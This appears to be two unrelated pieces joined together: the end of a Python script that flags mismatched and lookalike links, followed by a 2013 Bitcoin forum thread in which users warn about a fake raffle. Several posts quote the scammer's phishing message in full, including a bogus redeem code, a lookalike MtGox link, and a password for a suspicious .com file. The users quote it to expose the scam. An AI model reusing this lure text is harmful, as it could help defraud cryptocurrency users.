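    """Label left of the TLD (naive: assumes a one-label public suffix)."""
    host = (urlsplit(url).hostname or "").lower()
    labels = host.split(".")
    return labels[-2] if len(labels) >= 2 else host

def check_link(shown_text, href):
    """Compare what the message displays with where the link really goes."""
    findings = []
    scheme = urlsplit(shown_text).scheme.lower()
    if scheme and scheme not in ("http", "https"):
        findings.append(f"visible text uses unknown scheme '{scheme}'")
    shown, target = brand_label(shown_text), brand_label(href)
    if shown and target and shown != target:
        findings.append(f"text shows '{shown}' but link goes to '{target}'")
    for brand in sorted(TRUSTED):
        if target != brand and 0 < edit_distance(target, brand) <= 2:
            findings.append(f"'{target}' is a near-miss of '{brand}'")
    return findings

if __name__ == "__main__":
    for finding in check_link(SHOWN, HREF):
        print("FLAG:", finding)
```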
newbie
Activity: 54
Merit: 0
July 04, 2013, 03:08:25 AM
#11
Can someone please put a "SCAMMER" tag in front of his name? Maybe ban him as well???

You can update his trust rating at least for the moment :)

Cheers

Done.
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
July 04, 2013, 02:59:09 AM
#10
Anyways I'm crediting this game to anyroll
Goes to delete other scam warning
iAndroid mind spelling phishing correct :)
Scam Warning Anyroll 2.0 Legitnick 5 BTC Draw

GAH I cannot delete topics on this board!
Mumble Request delete of mine to prevent duplication should have looked again ;)

Please report all PMs to speed up delete :)
legendary
Activity: 1105
Merit: 1001
https://www.zebpay.com
July 04, 2013, 02:58:51 AM
#9
Can someone please put a "SCAMMER" tag in front of his name? Maybe ban him as well???

You can update his trust rating at least for the moment :)

Cheers
legendary
Activity: 1105
Merit: 1001
https://www.zebpay.com
July 04, 2013, 02:57:25 AM
#8
So at least now I learned a lesson :)

First that guy who was giving btc-e phishing links to wieners.. Now this guy :)

Why I still think, someone is willing to give away his Bitcoins like this :P

Lesson learned, move on..

@legitnick, enjoy BTC, Passwords (or whatever your .com file does) you get from newbies...

Cheers
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
July 04, 2013, 02:57:16 AM
#7
Re posting exact

Warning
Thread locked
Mailed to mods for verification
https://bitcointalksearch.org/topic/m.2612378
Url links to mtqox with a q

Winners are as follows:
candoo
Freedomno1
Ares
Palantir13
dwolfman
Obama
juronimo
albert speer
hurro
bachelor


Congratulations on becoming one of the winners!   
Below is a mtgox redeemable code loaded with .5 btc.  I picked these up before mtgox cancelled code creation, so you can still redeem them. 
I will post code and mtgox link below.

Code: 5kx9d0d67ce4jr984xbe0

htpps://mtgox.com/redeem-code.htm/

Please post on the Winner announcement thread once you get your coins. Thanks and enjoy your extra coins!
sr. member
Activity: 376
Merit: 312
Can you say... nighty-night?
July 04, 2013, 02:55:56 AM
#6
hey, the real winners are:

Winners are as follows:
Evolyn
claycoins
Elwar
A Meteorite
Jgguy
Obama
juronimo
albert speer
hurro
bachelor

got the same scam pm (just five other winners).

stupid scammer :/
newbie
Activity: 54
Merit: 0
July 04, 2013, 02:55:16 AM
#5
He also sent me a message, obviously I had won as well...

Winners are as follows:
akabmikua
fishy
George900
Jdumond
far004
Obama
juronimo
albert speer
hurro
bachelor

The link pointed to tries to open a Java applet, which asks for "unrestricted access". In short, DO NOT allow unrestricted access to that site. Can someone please put a "SCAMMER" tag in front of his name? Maybe ban him as well???
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
July 04, 2013, 02:53:47 AM
#4
Beat me by a minute lol verifying I'll keep the second thread up but credit yours as first
https://bitcointalksearch.org/topic/m.2612378
Winners are as follows:
candoo
Freedomno1
Ares
Palantir13
dwolfman
Obama
juronimo
albert speer
hurro
bachelor


Congratulations on becoming one of the winners!  
Below is a mtgox redeemable code loaded with .5 btc.  I picked these up before mtgox cancelled code creation, so you can still redeem them.  
I will post code and mtgox link below.

Code: 5kx9d0d67ce4jr984xbe0

htpps://mtgox.com/redeem-code.htm/

Please post on the Winner announcement thread once you get your coins. Thanks and enjoy your extra coins!
legendary
Activity: 1105
Merit: 1001
https://www.zebpay.com
July 04, 2013, 02:52:12 AM
#3
lol ;D

Quote from: legitnick on 03-07-2013, 10:39:38
Winners are as follows:
Sebastienurbain
halfawake
grm203
stelmoi
buysellbitcoin
Obama
juronimo
albert speer
hurro
bachelor


Congratulations on becoming one of the winners!   
Below is a mtgox redeemable code loaded with .5 btc.  I picked these up before mtgox cancelled code creation, so you can still redeem them. 
I've uploaded the codes, password to open .com file is legitnickiscool

htpps://mtgox.com/redeem-code.htm/

Please post on the Winner announcement thread once you get your coins. Thanks and enjoy your extra coins!
vip
Activity: 1316
Merit: 1043
👻
July 04, 2013, 02:51:00 AM
#2
Quote
*Note to Mods* Approved by John K. to keep in General Discussion.

Great idea ::)
full member
Activity: 182
Merit: 100
Swiss Money all around me!
July 04, 2013, 02:45:42 AM
#1
This guy was doing a free raffle up there:

https://bitcointalksearch.org/topic/5-bitcoin-independence-day-raffle-scam-phish-246400

He sent me a private message today:
Winners are as follows:
iAndroid
hashkey
danieldaniel
runam0k
BigBitz
Obama
juronimo
albert speer
hurro
bachelor


Congratulations on becoming one of the winners!  
Below is a mtgox redeemable code loaded with .5 btc.  I picked these up before mtgox cancelled code creation, so you can still redeem them. 
I will post code and mtgox link below.

Code: 5kx9d0d67ce4jr984xbe0

htpps://mtgox.com/redeem-code.htm/

Please post on the Winner announcement thread once you get your coins. Thanks and enjoy your extra coins!


As you can see this is not the URL of MtGox. He made the link to MtQox or something like this.
The link of HIS quote is going nowhere?
Code is not usable on MtGox.